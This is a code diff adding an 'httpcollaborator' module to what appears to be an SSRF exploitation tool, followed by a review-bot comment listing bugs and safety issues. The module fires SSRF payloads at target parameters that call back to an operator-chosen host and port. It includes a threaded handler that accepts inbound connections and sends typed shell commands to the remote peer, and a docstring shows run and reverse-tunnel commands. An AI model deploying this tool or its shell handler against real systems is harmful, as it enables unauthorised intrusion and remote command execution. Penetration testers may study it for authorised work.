|
| 1 | +from utils.utils import * |
| 2 | +import re |
| 3 | +import threading |
| 4 | +import logging |
| 5 | +import urllib.parse |
| 6 | + |
| 7 | +""" |
| 8 | +Example: |
| 9 | +``` |
| 10 | +~$ python3 ssrf-exploit.py -v -u url --lhost=public-ip --lport 4242 -m httpcollaborator -l http |
| 11 | +``` |
| 12 | +Use ssh/autossh to established remote tunnel between public and localhost handler if running module locally against remote target |
| 13 | +``` |
| 14 | +~$ ssh -fN -R public-ip:4242:127.0.0.1:4242 username@public-ip |
| 15 | +``` |
| 16 | +""" |
| 17 | + |
| 18 | +name = "httpcollaborator" |
| 19 | +description = "This module act like burpsuite collaborator through http protocol to detect if target parameters are prone to ssrf" |
| 20 | +author = "errorfiathck" |
| 21 | +documentation = [] |
| 22 | + |
| 23 | +class Handler(threading.Thread): |
| 24 | + |
| 25 | + def __init__(self, port): |
| 26 | + threading.Thread.__init__(self) |
| 27 | + logging.info(f"Handler listening on 0.0.0.0:{port}") |
| 28 | + self.connected = False |
| 29 | + self.port = int(port) |
| 30 | + |
| 31 | + def run(self): |
| 32 | + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 33 | + self.socket.bind(('', self.port)) |
| 34 | + |
| 35 | + while True: |
| 36 | + self.socket.listen(5) |
| 37 | + self.client, address = self.socket.accept() |
| 38 | + print(f"Handler> New session from {address[0]}") |
| 39 | + self.connected = True |
| 40 | + |
| 41 | + response = self.client.recv(255) |
| 42 | + while response != b"": |
| 43 | + print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='') |
| 44 | + response = self.client.recv(255) |
| 45 | + |
| 46 | + def listen_command(self): |
| 47 | + if self.connected == True: |
| 48 | + cmd = input("Shell> $ ") |
| 49 | + if cmd == "exit": |
| 50 | + self.kill() |
| 51 | + print("BYE !") |
| 52 | + exit() |
| 53 | + self.send_command(cmd+"\n\n") |
| 54 | + |
| 55 | + def send_command(self, cmd): |
| 56 | + self.client.sendall(cmd.encode()) |
| 57 | + |
| 58 | + def kill(self): |
| 59 | + self.client.close() |
| 60 | + self.socket.close() |
| 61 | + |
| 62 | + |
| 63 | +class exploit(): |
| 64 | + SERVER_HOST = "127.0.0.1" |
| 65 | + SERVER_PORT = "4242" |
| 66 | + |
| 67 | + def __init__(self, requester, args): |
| 68 | + logging.info(f"Module '{name}' launched !") |
| 69 | + |
| 70 | + # Handle args for httpcollaborator |
| 71 | + if args.lhost == None: self.SERVER_HOST = input("Server Host:") |
| 72 | + else: self.SERVER_HOST = args.lhost |
| 73 | + |
| 74 | + if args.lport == None: self.SERVER_PORT = input("Server Port:") |
| 75 | + else: self.SERVER_PORT = args.lport |
| 76 | + |
| 77 | + params = args.param.split(",") |
| 78 | + for param in params: |
| 79 | + logging.info(f"Testing PARAM: {param}") |
| 80 | + payload = wrapper_http(f"?{param}", args.lhost, args.lport.strip() ) |
| 81 | + r = requester.do_request(param, payload) |
| 82 | + |
| 83 | + logging.info(f"Module '{name}' finished !") |
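Review bot: In `exploit.__init__` the payload is built from `args.lhost` and `args.lport.strip()` instead of the `self.SERVER_HOST` / `self.SERVER_PORT` values resolved just above, so when a flag is omitted the prompted answer is ignored and `args.lport.strip()` raises `AttributeError` on `None`; use `payload = wrapper_http(f"?{param}", self.SERVER_HOST, self.SERVER_PORT.strip())`. `Handler` is defined but never instantiated or started in the visible code, so unless the framework starts it elsewhere, nothing is listening for the callback this module is meant to detect. If it is started, `run()` binds to every interface (`''`) and prints whatever a remote peer sends straight to the operator's terminal; decoding with `'ignore'` does not strip control or escape characters, so printing `repr(response)` or filtering non-printables would be safer, and a detection-only module does not appear to need `listen_command`/`send_command`. `socket` and `wrapper_http` reach this file only through `from utils.utils import *`, while `re` and `urllib.parse` look unused; explicit imports would make the real dependencies visible.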